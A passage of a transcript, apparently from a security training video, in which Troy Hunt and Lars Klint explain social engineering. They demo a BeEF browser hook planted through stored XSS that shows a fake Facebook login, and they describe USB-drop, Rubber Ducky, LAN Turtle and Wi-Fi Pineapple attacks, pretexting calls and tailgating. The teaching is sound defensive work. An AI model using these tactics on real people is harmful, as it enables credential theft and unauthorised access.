Course Overview

Course Overview

Hi. This is Troy Hunt and in this Play by Play course you're going to see my good mate, Lars
Klint and I, cover a heap of social engineering practices. You're probably already familiar
with what social engineering is, even if you perhaps don't know it by that term. So for
example, if you see advertisements, you inevitably see social engineering. If you have kids
like Lars and I, you probably see them attempt to socially engineer you many times over. We
may not know it by that term, but both of those are great examples of psychological
manipulation, which is what we're really talking about with social engineering. You're
probably also familiar with social engineering if you've ever received spam, particularly the
kind that tends to come from Nigerian princes with large amounts of money that they want to
ex-filtrate with your help. They just need a few funds to get started. When it comes to social
information and information systems, humans are the weak link and social engineering
attempts to exploit our flaws. Flaws like greed and curiosity and even other attributes of our
personalities that we'd normally consider to be very positive. So things like sympathy and
courtesy; they're both behaviors that an adept social engineer is very good at exploiting, even
the best protected systems can come undone when you put fallible humans into the mix and
often we become the weakest link and in this Play by Play course, you're going to see Lars
and I take you through a number of different social engineering tricks which attackers have
become very good at using in order to compromise both people and systems. We had a lot of
fun creating this Play by Play course and we hope you enjoy watching it.

Computer-based Social Engineering

What Is Social Engineering?

Hi, I'm Troy Hunt and this is a play-by-play for social engineering and I'm here with my
previous play-by-play partner, Lars. Hi Lars. How are you, Troy? Good. I'm Lars Klint and
I'm also a Pluralsight author and I'm going to be Troy's test bit today, I think, I'm not quite
sure. You're my muse today. Yes, I think I'm going to be hacked. So, we're going to talk
about social engineering, I know that much, but what is social engineering? Yes, well, I'm
glad you asked, Lars. So when we talk about social engineering, you know, social
engineering is something that we all see every day. We're all exposed to this every day in
various ways. We both have kids. They are very good at social engineering and we'll
probably talk a bit more about that later. That's very true, yes. We all watch the news, we see
advertisements on the TV, we see things in the paper, online; advertising is very much social
engineering as well and really when you talk about social engineering and obviously we're
going to talk about it in a malicious context today as well, we're really talking about
psychological manipulation. Yes. So how can, I was going to say an adversary, but let's
imagine this is in a marketing context as well, but how can a target be engineered and
manipulated in such a way that they do something that they may not normally do? So, for
example, in advertising, how can we get you to buy that thing which you probably don't need,
but we're going to create a demand and fear and whatever else it is that drives you in order to
go out and spend money. Yes, which is the essence of marketing, I guess. Yes, it is the
essence of marketing and look, whether you're trying to sell something or whether you're
trying steal someone's password, it's a similar sort of set of drivers and the interesting thing
about this is that social engineering is very much about exploiting a set set of human
weaknesses. Yes, so there's sort of the same sort of standard human weaknesses over and
over again. Yes. So, for example, you're a nice a guy. I'd like to think so. You're a
sympathetic guy and your sympathy is a human weakness insofar as an attacker might try to
say, hey, Lars, I'm in trouble; I need your help; I'm out of money, I'm stuck on the other side
of the world, and they would appeal to your sensitive, sympathetic nature. But surely they
would have to be someone that I know or have some relationship with. Well, this sort of now
gets to the point of what are the things the social engineer can do to try and do to be
effective? So we see enough social engineering attacks and particularly by spam. We're going
to look at spam quite a bit today as well, but we see a lot of stuff coming in by spam, which is
look, I am such and such a person, who you may not know and I'm sick and I just need a bit
of money to help me get better, so that's one thing. It's quite another that to your point if you
get a message from someone that you know and they say something like, I'm stuck on the
other side of the world and I got mugged and I don't have any money and I got to pay to get
out of the hotel, so that's probably more to your point. I have actually got that via Facebook, a
Facebook message from a friend, well, a Facebook friend, but still it was a relatively close
friend saying, I'm stuck and I need money, but it was an unusual characteristic for that person
so, you know, but it was certainly, you know, I guess that's what you're talking about--social
engineering. Yes, and that's interesting because when we look at the channels you get that
sort of message from, so when people email accounts are compromised and their address
books are now available to the attacker or when their social media is compromised and they
can now reach out to those friends, and you sort of made the point there that behavior was
uncharacteristic so you're sort of exercising your antisocial engineering skills there in terms
of saying, and it may be you do this very implicitly as well, but you've sort of said, is this
behavior characteristic of the person that I know? Yes, was it and it was not, but you're
absolutely right; had it been someone else that, well, it could've worked. Right. I'm not
discrediting that at all. No, and I guess the point there is that you're adept enough to know
how this person normally behaves, but you know, that's sympathy, that's one aspect and one
of the other sort of social engineering scams that we regularly see run is people asking for
money and you can probably guess what sort of human weakness they exploit, right? Well,
that's one of the seven sins, you know, that's greed. Right, and I think we all get these emails.
If you have an email address, the chances of you getting something like what I call Nigerian
scams, you know, maybe they're not all from Nigeria, but where they say, I've got all this
money and you can have some if you help me. I think they're really common, but I don't
know, but is it just me? Yes, now a perfect example. We are all equally exposed,
unfortunately, to that sort of scam and really I'm going to talk about two different types of
social engineering today, so we're going to talk about computer- based social engineering
which is when you're getting things electronically. So you're getting things like mail, you
might be getting solicitation via Facebook such as you mentioned before, and we'll look at
spam in a moment on that, and then we're also going to talk about human-based social
engineering. So how can attackers in whether it be a face-to-face scenario or a voice-to-voice
scenario interact directly with you human to human and convince you to do things that you
might not otherwise do? Well, that's called marketing, isn't it? Yes, it is, that's funny; there's a
bit of a fine line there sometimes. I know, yes. But there are certainly cases where the intent
is very clearly to gain some upside over an adversary with malicious intent. Yes. So, either to
get you to perform an action you wouldn't normally perform and okay, the marketing action
would be to buy something. Yes. For the social engineer with a malicious intent, the intent
might be to get you to click on a link or to go a website or to open an attachment, or the intent
may also be to get you to disclose something that you wouldn't normally do. Yes, that's what
I was getting at.
Computer-based Social Engineering - SPAM Email

So let's do this. Let's go and have a look at my junk mail because that is always a really good
place to start identifying very, very typical social engineering attacks. Yes, I'm getting you as
anyone else has hundreds of junk emails. I've got a lot of junk. I've got, as we can see here,
386 junk mail items in my folder here. They have come in over some period of time, but that
period of time is only a few weeks. So, I get a lot of these. There it is, another one just
coming right in right now. This is live, folks. This is real. So I get a lot of this sort of stuff
and you can see very easily just looking at the subject lines here. Look, there's probably just a
bit of junk in terms of trying to sell products and things like that, but as soon as I look at this
one at the bottom: Good day! I wish to know if we can work together. And you just know that
as soon as we look at something like that there is going to be an attempt to social engineer
me. Yes. Now you just mentioned the typical sort of Nigerian scam before, which is, you
know, Nigeria has become a bit of a colloquialism for the style of scam that asks for money
and in this case, they have a sum in USD Millions, I would a slice of USD Millions. Oh, but
he doesn't say how many millions he has. He doesn't say how many millions, but often it's
excessive, isn't it? I know, that's what I mean, well, I don't know; to me as a normal human
being, if someone and comes and says, oh, I'd like to give you $4 million out of the blue, I'd
go, oh no. You know if it's too good to be true, normally it is, so some of the scams to me are
just pointless, but they must work, like otherwise why would they do it? Well, work is a very
relative term. Or, have some effect. Well, here's the thing. So how many times is this message
sent, right? I don't know. I mean, it could be millions and millions and millions of emails that
get sent out because it's easy enough to send huge volumes as well and very often in this case
we're talking about adversaries who have access to things like botnet where they're sending
email from legitimate IP addresses, compromised machines. It's easy and cheap for them to
send out huge volumes. They only need a tiny, tiny, tiny hit rate in order to make their scam
successful and we're talking fractions of 1 percent. So, yes, you're smart enough and I'm
smart enough to see this and go, you know, it's a scam, I'm going to leave it, but hey, maybe
it's one in a million that says and they make a few grand out of it? As we have a look through
here and particularly if we go and let's do this, let's actually sort and instead of by date, let's
sort by size, because one of the things that ends to happen here, we've got our largest ones at
the top, is that very often these sorts of attacks want to try and attach malicious files and we
can see here, we've got one towards the top. "United Nations organization your payment
details. " Now this is, you know, if you ask me, I don't think it's particularly well put together.
No, it just says, I need an attachment file, I mean they're not even trying, right? Now we're
not seeing the attachment here because it's in junk and Outlook has quarantined it, which is
good, but yes, you're right, they're kind of not even trying, but this is a great delivery
mechanism for malicious files and we've seen so many zero-day exploits in various pieces of
software where if you open this and your virus checker may not be aware of what that exploit
is, it's a zero-days and you exploit it, then you yes, you have all sorts of problems. It may be
that you end up with a key logger on your machine or it ends up as a slave in a botnet.
Opening emails like this can get you in a lot of trouble. Absolutely, and I have workplaces
where people were not tech savvy and some reason these emails have come into the company
and they open one and there's been hundreds of infected machines within, you know, ten
minutes. Right, so and this is the thing because it propagates, too, right? Yes.

Computer-based Social Engineering - Phishing with BeEF

So that's problematic, but I thought we might go on and have a look at something a little bit
different in terms of a social engineering attack, a computer-based social engineering attack
and I've got a really good example and what I thought we might do is I might get you to open
one of my websites that I use in a lot of my courses, which is hackyourselffirst. troyhunt.
com. Hackyourselffirst. troyhunt. com. Alright. Alright, here we go. Oh, so it comes up,
Welcome to "Hack Yourself First. " Okay, cool, so you've got that loaded up and this is just
one of my deliberately vulnerable websites. So let's just close that mode there and what this
site does is it lists a whole bunch of really nice cars that you can log in and vote on and this
has a little bit of a compromise page in it. So what I might thought I might get to do, go to the
leader board up there in the navigation bar, yes, and then after you get to the leader board, I'm
going to get you to go down and choose that very nice Ferrari. Let's spot the Ferrari La
Ferrari, yes. Which would be Ferrari La Ferrari. And if you click anywhere around that row,
that'll open that up. Yes. And that is that you are now in trouble, and I want to show you
exactly how. What?! Oh, no, hang on. It comes it as a surprise. This is going to be a really
good example of how we can mount a phishing attack on a web page. So you've just loaded
the site and that's fine, everything looks very normal. There is nothing here that shows any,
anything wrong. It's a legitimate site. So here's what we're going to do. I'm going to jump
over onto my PC now and I've got a URL in my clipboard, which is opening a site called
BEEF, or in fact it's an application called BEEF and BEEF is the browser exploitation
framework and BEEF is kind of cool because what it's actually done is it's hooked your
browser. It has? Now, you don't know this, but, in fact what we'll do is I will now and try and
steal some information from you or convince you that you should give me some information
and then I'll explain the hook. Alright. So in my control panel here I can see online browsers
and I can see an IP address here, which is the one that we're on here at the conference center.
I'm going to open that up and I'm going to jump on over to the commands tab. Now what I'm
going to be able to do is effectively send commands to your machine and get that web page to
behave in different ways. Yes, right. I'm going to jump down to social engineering here and
I'm going to jump down to petty theft and what I want to do is pop up a Facebook dialog, so
you can see that that's what it's defaulted to, you see? Yes. We could go through and choose
this little LinkedIn, YouTube, you know, all those, you know, normal sorts of things. Okay.
I'm going to go and execute that and that is sending the command to your machine. So your
machine is effectively my zombie now. Yes, and I still have no clue; there is nothing to
suggest. You've still got no clue. No. So, because your machine is my zombie, what it means
is I can effectively send commands to it and you'll see things appear. Is this only while I have
this browser window open? Yes, so once you close it, it's going to be unhooked and we'll
have a look at that hook implementation in a moment. Okay. Alright, so see what you've now
got on your screen. Yes, there's a Facebook login form. Facebook session has timed out, so,
and this is the thing. Like you think about victims here. They're normally used to logging into
Facebook, right? Yes, it's just a click. Well, you just do it without thinking almost. Well, it's
certainly, you know, sort of an automatic mental thing and so oh, I need into Facebook, I'll
just put my credentials in, but we also see Facebook as a social login in so many places as
well. Absolutely. And look, I mean, you might look at this as someone who has got a bit of a
clue of the risks that this involves and say, well, maybe it's not such a good thing, but what's
really powerful about this is that your browser has just been sitting there polling my BEEF
server and I've been able to sit here in the control panel, here in the command center and
issue the command. Now just go and fill out your legitimate Facebook credentials there for a
moment. Really? Should I do this? This is social engineering in action now, so do this. Fill
out an email address, fill out a password, let us perhaps not use the legitimate ones. So you
want me to put in the real password? Wouldn't that be a great social engineering demo if we
get Lars to do that? No, put in a fake password. Alright. Alright, and then when you're done,
you log on. I trust Troy Hunt right now. Is that a good thing? I don't know. No. Not wise.
Okay, cool. So as far as you know, you just authenticated Facebook and you now go back to
business, but on my screen here I've got my module results history and I've got command 1
and I'm going to go and have a look at what the result of command 1 was, and here I have
your data. So you just logged in as me at larsklint. com, password 123. Oh, that's the right
one. Well, it is certainly what you just entered and for many people it is the right one because
they see the social login and they just go for it. Yes. So this is a really good example of both
the phishing and how easy it is to hook someone and the risk that I used on this particular site
was that there was a persistent SXS risk. So I was able to go and leave a comment on the
Ferrari here and in fact, if you scroll down a little bit on the left side of the screen you'll see it
says Troy Hunt says 'nice. ' Now as well as saying 'nice, ' I put in a script tag and the script
tag embedded a hook from BEEF, which then allowed me to take control from my machine.
So is this a common thing? Is this something that I should be aware of as a user? Would you,
if you were, say, a malicious hacker with a hoodie on, would you actually have, is there
access to a lot of these comment fields, for example, where you can put in these scripts? So
what is a common theme is that attackers do want to get things like social logins in front of
victims and there are multiple different ways of doing it. Using something BEEF, I mean
BEEF is a great way to sort of make a demonstration of how easy this is, but what attackers
would like to do is do things like if they can compromise an ad network, yes, and certainly
you see many cases that have in the past, is that they will embed script which will then call in
social logins and things like that and send the credentials off to their own machine. So
attackers are always trying to find ways to get this sort of information in front of victims, but
of course, this also raises the question and this is a really good question for any developers as
well. How do you protect your system if you assume that the user's password is
compromised? Because that's what I'm wondering. Is this, I mean, you can do now because,
you know, we're sitting here, next to each other and you're sort of explaining it, but is this a
common thing? Could you go onto any sort of major site with there's a comment section, say,
a new site for example, and would it be likely that they're not protected against this? Well,
we've got to remember, we saw two different risks here, so that the first risk was that that site
has a persistent XSS risk. Yes. So I was able to leave a comment that was JavaScript and not
only did it accept my JavaScript comment, but it then rendered that back to the source code of
the page, it didn't output in code, so that was sort of the initial victim and then of course there
was social engineering in terms of presenting you with a social login. But I want to get back
to this point about the expectation of your customers having had their accounts compromised,
usernames and passwords disclosed. Yes. So I know that you see this because you're a
security conscious guy, but if you were building system, what is the mitigation for
compromised accounts? How do you make sure that your users can authenticate themselves
securely, even if when the attacker knows their password? Well, you'd hope that your site has
two-fact authentication, for example. Right, so that brings us to 2FA. Now Facebook is a
really good example because on Facebook you have the ability of two-fact authentication, or
as we probably most strictly should call it, two-step verification, yes, because often you just
have the one vector, right? You have your phone, yes, and your phone has your email and it
has your authenticator app and all that sort of thing. Yes, but we have to sort of work on this
assumption where you need to assume the credentials are compromised, therefore you've got
to have a second step of verification. So even if someone fell victim to what happened just
then, and that was very clearly social engineering, yes, there's still that other layer of defense.
Yes, and this is, I mean when you say it, what comes to mind are the banks. Now if you log
into a bank, yes, you need to have your credentials, but if you want to do anything that has
any impact on your funds, you always have to put in a, get a text message into the code or
something like that. That's what I, you know, but if you're saying you can switch it on with
Facebook, but I don't, I might, I know a lot of people that wouldn't have done that. Yes, and
you raised another thing that's interesting too, which is that you can log into your bank, but if
you have to say, make a transaction above a certain value then you need to provide your code
and I really like the idea that you can actually have different layers of security and
verification depending on the actions being performed. So, look, I mean, perhaps going to
your bank and seeing your bank account details, we don't want an attacker to be able to do
that, no, but the impact of doing it is somewhat less than the impact of if they're actually able
to transfer funds. Right, that's right. So you might sort of present that second challenge at a
certain point. There are many people that would argue that should just have 2FA to log on in
the first place and that's a perfectly valid argument, but I like the recognition that we can
apply secure, or security in a more granular fashion as and where it's required. Yes,
absolutely. It's a fine balance between something that's annoying and something that's safe,
right? Because a lot of people are, oh, go and take my mobile again, and you know, it
becomes a hassle and you know how people want it now, now, now, so there's this fine line.

Social Media Phishing with Cross-site Scripting

Alright, so while we're talking about Facebook, I saw something interesting the other day
which is that one of the attacks that social engineers try to use, and let's just be clear as well,
social engineers, yes, we said our kids are social engineers, some social engineers, so you
know, they'll sort of appeal to our weaknesses and they'll ask mom and if mom says no, then
they'll go and ask dad and they'll go like mom says yes, and you know, we've all see this,
right? Yes, right. But the interesting thing is that kids themselves are good at malicious social
engineering and one of the things that we see kids do a lot of, and now we're talking about
more teenagers and kids that probably don't yet have a good sense of wrongs and rights in
terms of what they should and shouldn't be doing online, but we see things like cases where
they will try and get someone to copy and paste some script into the console of their
Facebook. So let me be clear at what I mean. I've got my Facebook open here and what they
would try and get you to do is, they'd write up instructions for the victim. Now we're keeping
in mind that the victim has no idea what they're actually doing here. They would say
something like, find out which of your friends has been looking at your profile; all you've got
to do is copy and paste the script. Oh, I was wondering how they actually got people to do it.
Right, so they have to incentivize because remember, they've got to appeal to a human
weakness and the weakness they're usually appealing to here is curiosity. But also the thing if
it's teenagers is the fear of missing out. Yes, there's that too. So you could say, oh if you don't
do this, then you won't get to go to the party or whatever. All your other friends are doing it,
right? Yes, exactly. So what they would do is something like they'd give instructions and say
press F12 and really what we're talking about here is effectively people XSS-ing themselves. '
They are mounting across-site scripting attack against themselves, which sounds really
bizarre and it only works when they can be coerced into running script in their browser. So
they have no idea that it's malicious because they have the end goal in mind to do it? Correct,
and frankly if you or I just eyeballed a big piece of JavaScript, it's very hard to tell without
sitting down and really thinking about it. Especially if it's obfuscated or whatever. Well,
exactly, they could obfuscate it as well and here's a question I often ask my workshops
particularly around proselyte scripting, what can you do if you can run arbitrary JavaScript on
someone else's website? Almost anything. That's the answer. You can do just about anything.
There are security controls around what JavaScript can and can't do. So for example,
JavaScript cannot access any cookies that are flagged as http only. Yes. Okay, good example.
The other thing is, is that if you use something like a content security policy, which white
lists the sources which external content can be loaded from, JavaScript can't be used to load
in other things from other domains that are untrusted. Alright. So there are some limitations
to what you can do with JavaScript, but you can certainly do a lot and in cases like this, you
could easily change the path of particular links or you could change words on pages or things
like that. You said kids, right? And we're talking JavaScript, which is not the easiest language
in the world, so is this a common thing or are we now talking about things that are probably
going to happen as kids get more and more educated? No, this happens now. It does. And
look, you're right. It's not a simple thing to write a sophisticated JavaScript attack, but by the
same token, kids don't have to go to work, you know? Like they don't have to cook dinner.
They'll stay up all night, they'll hack away at this stuff; they can be very clever and to be
clear, it's not always just kids in the legal sense. It could be that they are kind of younger than
us, therefore, you know, they're kids. Get off my lawn! It's that sort of thing.

Human-based Social Engineering

Common Examples of Human-based Social Engineering

Look, I think that's probably a good place to end around computer-based social engineering
and we should start to have a bit of a think about human-based social engineering. Okay. So I
mean, let me ask you the question. Can you think of cases where you have seen attempts to
human-based social engineer you? Yes, I get phone calls and the phone calls are often from
local companies, so in Australia there would be phone companies, there'd be power
companies, they'd be banks, but the people that ring always have an accent that's not
Australian. Which sounds like modern-day customer support. Yes, but the weird thing is that
they ring me to have something and it's always something like your internet will be switched
off if you don't do something or we need to verify your details, otherwise your account will
be closed. So there's, that's exploiting another human weakness, right? Yes. So it's you are
fearful that if you don't respond then you're going to lose something and I've seen the same
sort of thing that you're talking about where someone says, we are from your telephone
company or from your internet company and something is at risk or you're going to lose
something unless you follow our steps now. Yes, and it always is and often what I do,
because as we know, we work in this industry, I say, oh let me just call you back, because if
it's a legitimate thing then, yes, so it's often not very convincing, but. And do they give you a
number to call them back on? They don't, no, they often hang up. So here's something that's
curious because there are multiple issues that come up here. So you know, this is certainly
something that happens a lot and let's just define this human-based social engineering thing
for a moment. This is a human talking to you; this is not them sitting at the end of a terminal
with the luxury of time to sit there and digest your message and figure out how to respond.
No. These guys have got to be much better in terms of how they're actually going to engineer
you because you're going to ask questions and they've got to have responses ready. So
they're, already there's this sort of, they're leveling up a little bit. Now on the flip side, the
victim is somewhat more at risk because they're almost sort of on the back foot, right? Like,
I've just been called out of nowhere, I mean, like there's a virus on my computer or my
network is about to get switched off, my telephone is yanked and my cable company will go,
and they're having to be on the defensive and very often that puts them in a position of
weakness where they're having to respond without the luxury of time to think about it.
Absolutely, and I think what they may be targeting as well is people that are in a situation
where that could be possible right now. Like I know my internet is not going to be switched
off, but there may be a situation where someone, that could happen, so they're exploiting,
maybe they're probing, they're searching for weakness that may know exists in, for some
people. Yes, that's true and you know, let's sort of talk about the counter measure while we're
there because I half-jokingly said, do they give you a number to call them back on, and I
guess the joke here is that for the social engineer who is engaged in human-based social
engineering and they're really thinking about what they're doing, if the customer said, could I
have a number to call you back and verify you on, the social engineer would like to give you
a number that goes back to the social engineer. This is really not verification. Now I had a
really good case with someone who was saying that they were from my bank. In fact, I had
this several times because what would happen is it would be a long-distance call, a long delay
before I answered, then it was _____, like calls, a foreign accent, and 'this is your bank--we
would like to talk to you about your account, we just need to verify your details first--can you
tell us date of birth, ' so on and so forth. And I was saying to them, well this is fantastic--
thank you very much for calling me; I would like to verify you first, and these guys are going,
but we're your bank, and so I'm like I need you to prove to me that you are my bank--can you
give me some information about my account first? Well, no we can't, we need you to verify
yourself first, and I ended up saying to them, well look, I'll tell you what; I will go to your
website and I will get the phone number off your website and I will call you back, and they
said, no-no-no; that doesn't go to the right location--let us give you the phone number. But
the thing is, yes, go on. But let me finish this because I had to say to them, but you do not
realize the problem with that? You could give me any number. And as it turned out, it was
my bank. It was legitimately my bank and they exhibited all of the social engineering signs
and they even called back a couple of other times and eventually I had to call customer
service locally in Australia and say, look I think this is a scam and they very embarrassingly
said, no, it's not, and true story, they actually took a little bit of money off the interest of my
home line, too, after I reported it. Hah! Because I had the exact same thing happen, I was
about to say that, that's actually how they operate. Well, I did ask, I pushed. So that makes it
really hard to, as a consumer, to know when you, you know, when is it a scam or not? Like,
they're not making it any easier for us, right? Well, now you're quite right in that they don't.
Now this was one bank. I have another credit card provider who called me up and said, your
credit card has been defrauded and we would like to verify your identity and I was sort of
going, oh, man, here we go again. Okay, I need to verify you first. But this time they said,
okay, here's how you do it. Take the card out of your wallet, turn it over, and call us on the
phone number on the back. Yes, right. And that's also right because that is an independent
channel of verification. That's not them telling me how to do the verification. No, it's on the
thing. So it's already on there. I mean, they're telling me but they're giving me a way of doing
it independently. So unless they've actually faked the card, no never mind.

Social Engineering Devices

Alright, so let's talk about something else in terms of in-person social engineering and in fact,
in a way this isn't in person because you're not face to face with the attacker, but one of the
attack vectors, which is often popularized in discussing social engineering is USB sticks. Yes.
And one of the sort of canonical examples of social engineering via USB sticks is you'll have
an attacker walk through a car park, but with a handful of stuff like this. Now believe it or
not, this is actually legitimately what I pulled out of my travel bag. I had no idea. I did see it.
Why I have all of these, but they will go and they'll place them around the car park in certain
ways and the weakness that they're trying to exploit in the human here is? Well, someone is
going to find it and they're going to, oh, I wonder what's on it? What's on that? Curiosity.
Curiosity, exactly. So the human, the vulnerable human, will pick up the USB stick and go,
ah! I would've picked the gold one as well. So what's on here, pick the most one, whack in it,
and let's face it; it will be a little bit more subtle. It might be a large car park and they'll lay a
few around and they'll go back and plug it in my machine and inevitably a lot of malicious
software gets distributed via USB. In fact, I've got another good example that demonstrates it
just perfectly right here. Now this looks like a bottle opener USB stick. Yes. You can have a
look? It's real. Yes, which is what you get at any conference, almost. Right. There's nothing
unusual about this. Well, it's funny you should mention this. So I got this at a conference and
they were very popular because it is actually a bottle opener, you know? It's heavy; it has
weight to it, yes. It's got some heft to it. Now I was talking at this conference and just before I
went on stage, the distributors of this, and you will see that there's a recognizable Linux
distribution logo on it. There is indeed, yes. You might say which one. The distributors of this
had to come on stage and say, look, we're really sorry; every single one of these has got
malware on it and everyone that's plugging them into their machines is getting infected and
they didn't realize, because this is a Linux distro, it had a Windows-based piece of malware
on it, and I carried this around complete with malware, the entire time. You're welcome to
plug it in if you like. Is it safe. Don't plug it in. But that's what it was, just as a nice little
reminder of just badly this sort of stuff is distributed. So there was an accidental distribution
of it, really. Yes, so this was accidental; they certainly didn't intend to infect people and it
was very embarrassing for them as well. Yes, well I thought it might have been a conference
gimmick, you know? So there was nothing malicious other than you got infected with
something that was essentially benign. Yes, but no, you're saying it was actually not. No, it
wasn't intentional and it was malicious and it's not the first time, as well. There have been
other conferences, in fact there was another security conference in Australia some years ago
where one of the vendors there is handing out free USB and guess what? There's bad things
on it. Yes, right. So unfortunately, that does actually happen. Now we can take that even
further as well when we're looking at USBs and I've got another little bag of tricks here. Oh
yeah? And in fact, I did show this on another play-by-play so I'm only going to talk about it
very briefly, but this is, as you can see here? That's a rubber ducky. It's a USB rubber ducky
and what you can do. It sounds very, very safe. It sounds quite innocuous. What you can do
with the USG rubber ducky is you can use one of these and you can take a look at that. This
looks like exactly one I have from another company, except it's black instead of red. Right,
and if you saw that, you'd go okay, well that is just a thumb drive, right? Absolutely. But
what it actually is is a keyboard. What? Believe it or not, it is a keyboard. So what you can do
is you can actually take this thing apart and inside it has a little chip and the little chip can be
programmed. This is mad! This is James Bond. And there's like a little micro SD card in there
and then that is what you program such that when you plug that in; I know, it's cool, isn't it?
It's awesome. So this has a got a little caddy that you program and it will place it and then
you put it in the USB slot and that then becomes the attack vector. So you could set this up to
run particular commands on the host operating system, open software, connect to external
services; there's a whole lot you can do with this. You can program it to target either PCs or
Macs or whatever, you know, device you think that your victims are going to plug into. So
this is a really good example of social engineering because people generally don't think about
the risks associated with the USB stick, and they like receiving them. No, not at all. This was
the problem with these guys, right? Yes. The silver ones here. Yes, and they're shiny.
Everyone liked getting these and the first thing they want to do is whack it into their PC. Yes,
and I'm just thinking that this sort of relates back to the email, doesn't it, because you have
something that is left by someone else, right? It's like a link. You know, you don't know what
the link is, don't click on it; you don't know what's on the USB. Curiosity again. Yes. Alright,
so let's put all this aside. Yes, I'll put it over here. That's USBs and we'll put that over here.
Now, another good example. So while we're talking about sort of physical hardware-based
hacking in a social engineering context as well, another good one from the same company,
this little device called a, a land turtle. Land turtle. So we've got duckies and turtles. Duckies
and turtles. Now here is what the land turtle does. So when you pull this guy out, and I'm
going to take it out of its packaging, and see what this looks like. Look at the other end. That
looks like something I have in my bag, which is a LAN to USB. Yes, so basically it's an
ethernet adaptor that you can plug into a machine, like your surface pro, which doesn't have a
hard wire in it. Yes, that's why I have one in my bag. Right, and the case. Now you know,
this is a really good example of where a social engineer might want to leave this attached to a
machine so they can have remote control over it, because what this actually does is it gives
them control of the device and it's USB as well, so they can send commands to the machine
and it's also a man-in-the-middle device because your connection is going through here and
you can control the traffic. But you've still got to plug it in. You've still got to plug it in. Now
this will bring us to this sort of in-person on-premises kind of social engineering. Okay. We'll
talk about that in a moment, too. Okay, yes. We'll talk about how you could possibly get this
into an organization, but of course, one of the things that might happen if you're in an
organization and someone has placed this on your machine is you might become a little bit
suspicious of it. Well, yes. So I'll let you hold that and I'll show you how we might fix it. So I
would do as a social engineer is I would put a big note on it and I'd say, like this, and I'd
probably put a great big rubber band on it and then I'd attach that, so tell everyone that says.
IT--do not remove! Alright, now IT has said that you need to leave it in your machine and
then you wrap that together with a big rubber band around it and stick in the machine, and
someone would go, well, it does say IT, you know? It looks odd, but it's from IT, we'd better
not remove it. Yes, and we all know that IT people do odd things, like, we're not meant to
understand. Well, look there is that, granted, IT people do odd things, but the other thing is is
that IT in many organizations, when it comes to the way machines are managed is a bit of an
authority, okay, insofar as they do these wonderful magic things; people trust them to get all
this stuff right, and just as IT might plug that into a machine and ask for it not to be removed,
IT might also call someone up and say they're having some problems with their machine.
Yes. Look, we're going to try and help you out; I've noticed you have some dramas, we're just
going to need to get your password first. Okay. Now something like that, of course, is a pretty
sort of unsophisticated approach, you know? Just give me your password, but what a social
engineer will try and do is give the person a bit more information to give them confidence
that the social engineer is indeed legitimate. Yes. So they might say, for example, look we
can see that you're there in the marketing department on a certain level in a certain office.
We've got particular problems with that area, you know? Now what we'd like to do is try and
get your password to help you sort it out. And we're going to talk in a moment about open
source intelligence and how attackers get that sort of information, but they want to create that
heir of authenticity. Yes, absolutely. Now another trick that I read about just the other day
which was quite interesting and this one was from Kevin Mitnick who was a great big hacker
back in the 1990s. He was very infamous, ended up going to jail, gone good, and written
many interesting things, and one of the things he said is what he would do when calling
someone up in that sort of capacity, in order to socially engineer them. Let's say he called
someone up at an organization. He'd call them up and just after he started talking to them he'd
say, hang on, I need to put you on hold, we've got another call, and he would play an
advertisement from the company that he was calling. Now he's pretending to be from that
company, right, but what he's doing is he's saying, you know, I'm calling from Acme Corp. I
just got another call, let me put you on hold, and then play an Acme Corp ad. So it feels
legitimate. It feels legitimate and it's not that the person on the other end of the phone goes,
oh, I've heard the ad, that's it, it's all okay, but it is that little subliminal psychological thing
where they go, ah!. There's just a little bit more authenticity. Yes, well, that's very clever. So
that one is a good one. The other one that I have shown many, many times in many of my
talks and this is the sort of the latest evolution of it is the pineapple, the Wi-Fi pineapple. Yes.
And this is the Nano, this is actually a USB one. You can just plug it straight into a USB and
effectively this becomes a malicious wireless hotspot. So a thing a evil. It is a thing of evil
and it is enormously effective at being evil and by using this I can stand up a wireless hotspot
that people will either see and consciously connect to because I've called it free Wi-Fi or
something, yes, and that again is social engineering because I'm tricking people into thinking
that they're going to get free Wi-Fi. Which they may get. We'll put it this way. They will get
something. They may actually get a connection which seems legitimate. That's what I mean,
yes. But it's all going through this device and I'm able to log all the traffic and modify any of
the unencrypted traffic. Of course, I can log encrypted traffic, but I can only read unencrypted
traffic. Yes. And it's also particularly malicious in that it can actually rebroadcast the network
names that the device was previously associated with, in which case the device that someone
might even not take out of their pocket can actually associate with this and then start sending
all the traffic through. This is also from the same guys, a company called Hack 5 make the
rubber ducky and the land turtle and the Wi-Fi pineapple, which is kind of neat.

How Social Engineers Gain Access

But I think one other thing that we should talk about while we're here as well is when we're
talking about the land turtle, we said, look, someone might actually plug this into the back of
a machine in an organization, but of course to do that, the social engineer in these human-
based social engineering capacities has got to get on site. Yes, physical access. They've got to
be able to get physical access and of course, you've got to plug that into a machine, so it sort
of raises the question of how are we going to get the thing on site? So as a social engineer,
how are we going to gain access to the premises and I thought what we might do, because
this is a good forum for play-by-play, a good structure to do it in play-by-play is we might get
up and move over to the door and I'll show you how we might get someone on site. Alright,
sure. Alright, so I'm hanging around outside a place of work which I would like to gain
access to, me in my social engineering capacity. You are a victim employee of the workplace
and you're going to walk through the door. Now let's see what happens when we do this. So
you're off your way to work. Yes. Alright, so that's just a really simple case or example called
tailgating, so I'm following you through. That made me feel suspicious though, like what?
Well, yes and no, because you've got to remember most people would like to be polite and
hold the door. That's true and if it's a larger company then you might not know everybody
that works there anyway. Yes, right, because do you really feel compelled to effectively slam
the door in someone's face? However, you did look suspicious, so let's level up. So here's
what I'm going to do. I'm going to take a prop. Alright. You have a box. Gee, this box is
heavy, can you grab the door for me Lars? Ah, yeah. Thank you. Alright, so we're laughing
because it is inanely simple, but the very fact that someone is there struggling with something
makes you even more sympathetic to their cause and wanting to help them get through, and
there are lots of little sort of tweaks like this which tend to happen with social engineering, so
that's one of them. The other is, would you feel more inclined to let me through, or would you
be less suspicious if you saw me on site, if I was wearing a high-visibility vest? I was just
thinking disguise. Maybe a hard hat, because no one sees the guy in the high-visibility vest,
right? That's true, that's true. So things like that, these are all ways of getting on site and then
when I'm on site, then I want to use things like the land turtle or I want to do stuff like go
through your garbage bins, because there's a lot of stuff in dumpsters. This is the whole idea
of dumpster diving. I go through and I pull stuff out of the rubbish bin and there's personally
identifiable information, sensitive info, company negotiations, things like that actually on
premises, but that again is very much human-based social engineering because I've got to be
on there, on the place of work and basically ready for people to come up and challenge me as
well. So what you're saying is that companies actually need to educate their staff? Yes,
absolutely, and the education needs to be, look, it's not an offense to possibly say to someone,
